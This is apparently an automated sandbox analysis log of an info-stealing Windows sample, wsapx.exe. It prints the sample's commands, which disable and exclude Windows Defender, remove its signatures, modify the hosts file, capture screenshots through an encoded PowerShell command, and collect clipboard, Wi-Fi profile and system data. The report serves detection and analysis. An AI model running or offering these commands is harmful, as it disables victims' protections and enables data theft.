0_2_00007FF7C71D34F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7C71BC910
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7C71CA684
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71BD37C SetUnhandledExceptionFilter,	0_2_00007FF7C71BD37C
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7C71BD19C
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF7C71BC910
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF7C71CA684
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71BD37C SetUnhandledExceptionFilter,	2_2_00007FF7C71BD37C
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF7C71BD19C
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94623068 IsProcessorFeaturePresent,00007FFDAC0619C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDAC0619C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFD94623068
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E624C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF60E624C10
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E61A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	110_2_00007FF60E61A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E61B6D8 SetUnhandledExceptionFilter,	110_2_00007FF60E61B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E61B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF60E61B52C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\wsapx.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
